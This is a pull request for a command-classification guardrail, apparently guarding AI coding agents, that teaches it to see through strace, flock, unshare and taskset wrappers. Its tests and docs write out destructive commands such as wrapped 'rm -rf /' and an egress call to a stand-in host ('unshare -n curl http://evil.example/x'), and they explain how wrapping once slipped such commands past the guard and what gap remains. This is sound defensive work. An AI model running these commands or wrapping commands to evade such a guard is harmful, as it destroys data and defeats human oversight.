### PR TITLE
fix(rules): see through strace, flock, unshare and taskset in the wrapper walk

### DIFF
--- a/changelog.d/654.fixed.md
+++ b/changelog.d/654.fixed.md
@@ -1,0 +1,1 @@
+- A destructive or egress command wrapped in `strace`, `flock`, `unshare`, or `taskset` now classifies the same as its unwrapped form instead of silently passing (#654)

--- a/docs/LIMITATIONS.md
+++ b/docs/LIMITATIONS.md
@@ -259,10 +259,11 @@ wrapper's own option as if it were the command, and missed what came after it.
 
 The shared command-parsing helper now recognizes each of these wrappers' own value-taking options
 and skips past them before looking for the wrapped command: `sudo`, `doas`, `runuser`, `env`,
-`nice`, `ionice`, `timeout`, `chroot`, `time`, `exec`, `stdbuf`, `nohup`, `command`, and `setsid`. It
-chains through nested wrappers too, for example `sudo -n nice -n 5 rm -rf /`. `runuser -c`,
-`--command`, and `--command=` are treated as opaque, exactly like `su -c`: their payload is walked
-the same way, never treated as an option to skip past.
+`nice`, `ionice`, `timeout`, `chroot`, `time`, `exec`, `stdbuf`, `nohup`, `command`, `setsid`,
+`builtin`, `strace`, `taskset`, `flock`, and `unshare`. It chains through nested wrappers too, for
+example `sudo -n nice -n 5 rm -rf /`. `runuser -c`/`--command`/`--command=` and `flock -c`/
+`--command` are treated as opaque, exactly like `su -c`: their payload is walked the same way, never
+treated as an option to skip past.
 
 Now that the wrapped command is recovered, a wrapped `rm -rf /` gets `BLOCK`ed and a wrapped secret
 exfiltration attempt gets the same verdict as its unwrapped form. That closes what used to be a real
@@ -281,10 +282,19 @@ split cleanly into shell tokens, the leftover option or value tokens are never r
 either. A command segment whose first word is still an unresolved option after wrapper stripping
 steps up to `AUTH` (`opaque_command`) instead of silently passing through.
 
-The honest remaining gap: a wrapper outside this list, such as `strace`, `flock`, `unshare`, or
-`taskset`, still shifts the argument list in a way Doberman doesn't recognize, so its wrapped command
-isn't seen at all. Egress behind one of those still steps up through the existing ambiguous-egress
-`AUTH`, never a silent `PASS`.
+Before this fix, `strace`, `flock`, `unshare`, and `taskset` were exactly that kind of unrecognized
+wrapper, and the actual result was worse than the ambiguous-egress `AUTH` this document used to claim:
+none of the four was on the wrapper list at all, so the shared helper didn't even try to skip past
+their options — it read the wrapper's own name as the command verb, found no destructive pattern and
+no known egress tool there, and let the whole line through. `strace -f rm -rf /`, `flock /tmp/lock
+rm -rf /`, `taskset -c 0 rm -rf /`, and `unshare -n curl http://evil.example/x` were each a silent
+`PASS`, hiding the wrapped command entirely rather than stepping up to `AUTH`. All four are now on
+the recognized-wrapper list above and classify the same as their unwrapped form.
+
+The honest remaining gap: a wrapper outside that list still shifts the argument list in a way
+Doberman doesn't recognize, so its wrapped command isn't seen at all — the same silent-`PASS` failure
+mode these four just came out of, not the `AUTH` step-up this section previously (and incorrectly)
+described.
 
 ## Behavior-learning checks only run on the MCP proxy path today, not on the Claude Code or OpenClaw hooks
 

--- a/docs/LIMITATIONS.md
+++ b/docs/LIMITATIONS.md
@@ -285,14 +285,14 @@ steps up to `AUTH` (`opaque_command`) instead of silently passing through.
 Before this fix, `strace`, `flock`, `unshare`, and `taskset` were exactly that kind of unrecognized
 wrapper, and the actual result was worse than the ambiguous-egress `AUTH` this document used to claim:
 none of the four was on the wrapper list at all, so the shared helper didn't even try to skip past
-their options — it read the wrapper's own name as the command verb, found no destructive pattern and
+their options. It read the wrapper's own name as the command verb, found no destructive pattern and
 no known egress tool there, and let the whole line through. `strace -f rm -rf /`, `flock /tmp/lock
 rm -rf /`, `taskset -c 0 rm -rf /`, and `unshare -n curl http://evil.example/x` were each a silent
 `PASS`, hiding the wrapped command entirely rather than stepping up to `AUTH`. All four are now on
 the recognized-wrapper list above and classify the same as their unwrapped form.
 
 The honest remaining gap: a wrapper outside that list still shifts the argument list in a way
-Doberman doesn't recognize, so its wrapped command isn't seen at all — the same silent-`PASS` failure
+Doberman doesn't recognize, so its wrapped command isn't seen at all, the same silent-`PASS` failure
 mode these four just came out of, not the `AUTH` step-up this section previously (and incorrectly)
 described.
 

--- a/src/doberman/engine/rules/commands.py
+++ b/src/doberman/engine/rules/commands.py
@@ -242,12 +242,71 @@ _WRAPPER_VALUE_OPTIONS: dict[str, frozenset[str]] = {
     # — transparent, no options of its own, so it hides a destructive segment
     # (`builtin rm -rf /`) the same way an unstripped `command`/`exec` would.
     "builtin": frozenset(),
+    # #634: strace/taskset/flock/unshare were missing entirely, so their bare
+    # name shifted argv so a flag (or its value) was misread as the wrapped
+    # command — a silent PASS for `strace -f rm -rf /`, `taskset -c 0 rm -rf
+    # /`, `flock /tmp/lock rm -rf /`, `unshare -n rm -rf /` (and, via the
+    # shared `_command_verb` egress classifier, `unshare -n curl ...`).
+    # strace(1): only the options that take a SEPARATE value token; `-f`/
+    # `--seccomp-bpf`/etc. are bare flags with no value and fall through to
+    # the generic bare-flag drop.
+    "strace": frozenset(
+        {
+            "-o",
+            "-e",
+            "-p",
+            "-s",
+            "-a",
+            "-E",
+            "-I",
+            "-P",
+            "-u",
+            "-X",
+            "-b",
+            "-O",
+            "-S",
+            "--output",
+            "--trace",
+            "--attach",
+            "--user",
+        }
+    ),
+    # taskset(1): `-a`/`-c`/`--cpu-list`/`-p`/`--pid` are all bare flags (no
+    # `:` in taskset's own getopt string) — the CPU mask/list that follows is
+    # a fixed positional, not an option value (see `_WRAPPER_POSITIONALS`).
+    "taskset": frozenset(),
+    # unshare(1): its own namespace flags (`-m`/`-u`/`-i`/`-n`/`-p`/`-U`/
+    # `-C`/`-T`, `--mount-proc`, `--kill-child`) take only an OPTIONAL value
+    # attached via `=`/same-token — never a separate token — so they are bare
+    # flags here, same as `--fork`/`-r`/`--map-root-user`. The set below is
+    # the options that DO take a mandatory separate-token value.
+    "unshare": frozenset(
+        {
+            "--map-user",
+            "--map-group",
+            "--propagation",
+            "--setgroups",
+            "-R",
+            "--root",
+            "-w",
+            "--wd",
+            "-S",
+            "--setuid",
+            "-G",
+            "--setgid",
+        }
+    ),
+    # flock(1): the lock file/fd is a fixed positional (`_WRAPPER_POSITIONALS`
+    # below); `-c`/`--command` is an opaque payload option, not a value
+    # option (`_WRAPPER_OPAQUE_OPTIONS`).
+    "flock": frozenset({"-w", "--timeout", "-E", "--conflict-exit-code"}),
 }
 #: Existing readers of the bare-name set keep working.
 _TRANSPARENT_WRAPPERS = frozenset(_WRAPPER_VALUE_OPTIONS)
 #: Wrappers that take a fixed number of positional arguments BEFORE the
-#: wrapped command (``timeout DURATION cmd``, ``chroot NEWROOT cmd``).
-_WRAPPER_POSITIONALS = {"timeout": 1, "chroot": 1}
+#: wrapped command (``timeout DURATION cmd``, ``chroot NEWROOT cmd``,
+#: ``taskset MASK cmd``, ``flock FILE cmd``).
+_WRAPPER_POSITIONALS = {"timeout": 1, "chroot": 1, "taskset": 1, "flock": 1}
 
 #: I2 — a wrapper key here is otherwise transparent (its OTHER options are in
 #: `_WRAPPER_VALUE_OPTIONS`), but one of these markers turns the whole
@@ -256,6 +315,11 @@ _WRAPPER_POSITIONALS = {"timeout": 1, "chroot": 1}
 #: is "one following token". See ``_wrapper_opaque_option_ahead``.
 _WRAPPER_OPAQUE_OPTIONS: dict[str, frozenset[str]] = {
     "runuser": frozenset({"-c", "--command"}),
+    # #634: flock's `-c`/`--command` runs its payload through the shell,
+    # exactly like `su -c`/`runuser -c` — opaque, never a transparent value
+    # option (see `_opaque_shell_payload`, which recognizes this marker on
+    # `flock` the same way it already does for `su`/`runuser`).
+    "flock": frozenset({"-c", "--command"}),
 }
 
 # `env`'s own no-op flags (no operand) and its unset flags (take one operand),
@@ -2026,6 +2090,9 @@ def _opaque_shell_payload(tokens: list[str]) -> bool:
     ``runuser -c`` is ``su -c`` with a different name (a root shell running an
     arbitrary payload) — its own `_WRAPPER_OPAQUE_OPTIONS` entry keeps it, and
     its ``-c``/``--command`` marker, intact in ``tokens`` for this same check.
+    #634: ``flock -c``/``--command`` is the same opaque payload shape — its
+    own ``_WRAPPER_OPAQUE_OPTIONS`` entry keeps ``flock`` and the marker
+    intact for this same check too.
     #555: ``eval`` is never a transparent wrapper either (absent from
     ``_WRAPPER_VALUE_OPTIONS``, so ``argv_from_tokens`` leaves it and its
     arguments untouched) — bash concatenates its arguments with a single
@@ -2040,7 +2107,7 @@ def _opaque_shell_payload(tokens: list[str]) -> bool:
         return len(tokens) > 1
     if head in _SHELLS:
         return "-c" in tokens or "--command" in tokens
-    if head in ("su", "runuser"):
+    if head in ("su", "runuser", "flock"):
         return (
             "-c" in tokens
             or "--command" in tokens

--- a/tests/unit/test_rule_commands.py
+++ b/tests/unit/test_rule_commands.py
@@ -1714,6 +1714,22 @@ def test_interpreter_spawn_explanation_is_redacted():
         "runuser -u root -c 'rm -rf /'",
         "runuser --command='rm -rf /'",
         "sudo -u root runuser -c 'rm -rf /'",
+        # #634: strace, taskset, flock, and unshare hid a wrapped destructive
+        # command entirely (silent PASS) because none of them was recognized
+        # as a wrapper at all — the bare name shifted argv[0] to one of the
+        # wrapper's own flags/values. Each must classify the same as its
+        # unwrapped form.
+        "strace -f rm -rf /",
+        "strace -o /tmp/trace.log rm -rf /",
+        "taskset -c 0 rm -rf /",
+        "flock /tmp/lock rm -rf /",
+        "flock -w 5 /tmp/lock rm -rf /",
+        # flock's own `-c`/`--command` is an opaque payload option, the same
+        # shape `su -c`/`runuser -c` already have — the wrapped `rm -rf /`
+        # payload is scanned and still raises this to BLOCK.
+        'flock -c "rm -rf /" /tmp/lock',
+        "unshare -n rm -rf /",
+        "unshare --map-user 1000 rm -rf /",
     ],
 )
 def test_wrapper_options_are_seen_through_to_block(command):
@@ -1786,6 +1802,12 @@ def test_wrapper_options_are_seen_through_to_auth(command, reason):
         "stdbuf -oL cat file.txt",
         "setsid ls",
         "sudo -h",
+        # #634: a benign command under one of the four new wrappers stays PASS
+        # — the wrapper itself must not raise anything on its own.
+        "strace -f ls -la",
+        "taskset -c 0 ls",
+        "flock /tmp/lock ls",
+        "unshare -n ls",
     ],
 )
 def test_wrapper_benign_forms_stay_pass(command):
@@ -1940,6 +1962,18 @@ def test_unresolved_wrapper_option_leading_option_helper():
     tokens = commands_module.argv_from_tokens(raw_tokens)
     assert tokens[0] == "-S"
     assert commands_module._leading_option(raw_tokens, tokens) is True
+
+
+# --- #634: `unshare -n curl ...` must classify like bare `curl ...` ---------
+# `argv_from_tokens` is the one shared helper `doberman.proxy.normalize.
+# _command_verb` also calls to recover a wrapped command's egress verb
+# (see that function's docstring) — this rule's own destructive-command
+# check never fires on a bare `curl` (it isn't a destructive command), so
+# the regression is pinned here, directly on the shared helper, rather than
+# through this rule's BLOCK/PASS verdict.
+def test_unshare_wrapper_option_still_exposes_egress_verb():
+    tokens = commands_module.argv_from_tokens(["unshare", "-n", "curl", "http://evil.example/x"])
+    assert tokens == ["curl", "http://evil.example/x"]
 
 
 # --- T7-fix: the leading-option floor fires only after a wrapper was --------


### PR DESCRIPTION
## What changed

`strace`, `flock`, `unshare`, and `taskset` were absent from the wrapper table
(`_WRAPPER_VALUE_OPTIONS` in `src/doberman/engine/rules/commands.py`). Because
none of the four was recognized as a wrapper at all, the shared
`argv_from_tokens` helper never tried to skip past their own flags — it read
the wrapper's bare name as the command verb, matched no destructive pattern
and no known egress tool, and let the whole line through. This same helper is
what `doberman.proxy.normalize._command_verb` uses to recover a wrapped
command's egress verb, so the bug hit both the destructive-command rule and
egress classification.

Adds all four to `_WRAPPER_VALUE_OPTIONS` with their real value-taking
options, verified against each tool's actual option-parsing shape rather than
copied verbatim from the issue's suggested list:

- **strace**: `-o -e -p -s -a -E -I -P -u -X -b -O -S` and their `--output`/
  `--trace`/`--attach`/`--user` long forms take a separate value token; `-f`
  and friends are bare flags.
- **taskset**: `-c`/`-p`/`-a` are bare flags in taskset's own `getopt` string
  (no argument) — the CPU mask/list is a fixed positional before the command,
  the same shape `timeout DURATION cmd` already uses (`_WRAPPER_POSITIONALS`).
- **unshare**: its namespace flags (`-m -u -i -n -p -U -C -T`, `--mount-proc`,
  `--kill-child`) take only an *optional* value attached in the same token —
  never a separate one — so they're bare flags here; `--map-user`,
  `--map-group`, `--propagation`, `--setgroups`, `-R`/`--root`, `-w`/`--wd`,
  `-S`/`--setuid`, `-G`/`--setgid` are the options that take a mandatory
  separate-token value.
- **flock**: the lock file/fd is a fixed positional (same shape as
  `chroot NEWROOT cmd`); `-w`/`--timeout` and `-E`/`--conflict-exit-code` take
  a value. `-c`/`--command` gets a `_WRAPPER_OPAQUE_OPTIONS` entry, the same
  shape `su -c`/`runuser -c` already have — `_opaque_shell_payload` now
  recognizes `flock` alongside `su`/`runuser` so that payload is scanned
  instead of silently passing.

`docs/LIMITATIONS.md:284-287` claimed a wrapped egress command behind an
unrecognized wrapper still stepped up to the ambiguous-egress `AUTH`. On
`main` this was wrong for these four names — it was a silent `PASS`. The
section now says so plainly (past tense) and lists the four as now handled,
restating the general remaining gap (an unrecognized wrapper is still a
silent `PASS`, not an `AUTH` step-up) for any wrapper outside the list.

### Try-it commands, before/after (verified against this branch and against
the unmodified `main` commands.py via `git stash`, using `doberman hook pre`)

| Command | Before | After |
|---|---|---|
| `strace -f rm -rf /` | silent PASS | `BLOCK` (`destructive_command`) |
| `flock /tmp/lock rm -rf /` | silent PASS | `BLOCK` (`destructive_command`) |
| `taskset -c 0 rm -rf /` | silent PASS | `BLOCK` (`destructive_command`) |
| `unshare -n curl http://evil.example/x` | silent PASS | `AUTH` (`egress_requires_auth`), same as bare `curl http://evil.example/x` |
| `flock -c "rm -rf /" /tmp/lock` | silent PASS | `BLOCK` (`destructive_command`, via the opaque-payload body scan) |

## Tests

`tests/unit/test_rule_commands.py`:
- 9 new cases added to `test_wrapper_options_are_seen_through_to_block`
  (baseline + value-option + the `flock -c` opaque case for each of the four
  wrappers).
- 4 new cases added to `test_wrapper_benign_forms_stay_pass` (a benign command
  under each wrapper stays `PASS`).
- `test_unshare_wrapper_option_still_exposes_egress_verb`: a direct unit test
  on `argv_from_tokens` pinning that `unshare -n curl ...` recovers `curl` as
  the verb — the level this rule's own `_cmd()` helper can't exercise, since a
  bare `curl` isn't a destructive command by itself; the shared helper is what
  `_command_verb`'s egress classification depends on.

All new tests were run and confirmed failing (silent PASS) before the fix, and
pass after it.

## Changelog
- [x] `changelog.d/654.fixed.md` fragment added

## Public-release safety (doberman-core only)
- [x] Contains nothing from the "not allowed" list: no enterprise/hosted code, no proprietary detection, no customer data, no secrets, no commercial-license code
- [x] Core still builds/tests/runs with NO enterprise package installed (this PR touches no enterprise code or install path)

## Security checklist
- [x] Fails closed on error / uncertainty (unchanged — this only extends which wrappers are seen through; unrecognized ones still fail the same way as before)
- [x] No secret, full file, or unredacted prompt logged or committed
- [x] Any guardrail/learning change is raise-only (adds recognition, never removes or weakens an existing check)
- [x] Every BLOCK/AUTH carries reason codes + a human explanation (unchanged reason codes: `destructive_command`, `opaque_command`, `egress_requires_auth`)
- [x] doberman-core does not import doberman_enterprise

## Edge cases covered / Deviations from plan / Risks introduced
- Value-option-vs-positional edge case per wrapper: `taskset`'s `-c`/`-p`/`-a` are bare flags (its own `getopt` string takes no argument for any of them) with the CPU mask as a fixed positional — not a value option, despite reading that way in a `taskset -c 0 cmd` invocation. Implemented via the existing `_WRAPPER_POSITIONALS` table (same shape as `timeout`/`chroot`), not `_WRAPPER_VALUE_OPTIONS`.
- `unshare`'s namespace flags (`-m -u -i -n -p -U -C -T`, `--mount-proc`, `--kill-child`) take only an optional attached value (`--mount-proc=/proc2`, never a separate token) — verified against the tool's own `--help` text and excluded from the value-option set, since including them would consume the next argv token (the wrapped command itself) as if it were an option value.
- `flock -c "<payload>" /tmp/lock` (opaque option before the positional) is handled by `_wrapper_opaque_option_ahead`; `flock /tmp/lock -c "<payload>"` (positional before the opaque option) is not specifically covered — same class of order-sensitivity the existing `su`/`runuser` opaque handling already has, not a regression.
- No new helpers added; reused `_WRAPPER_VALUE_OPTIONS`, `_WRAPPER_POSITIONALS`, and `_WRAPPER_OPAQUE_OPTIONS`, all pre-existing tables.

Closes #634

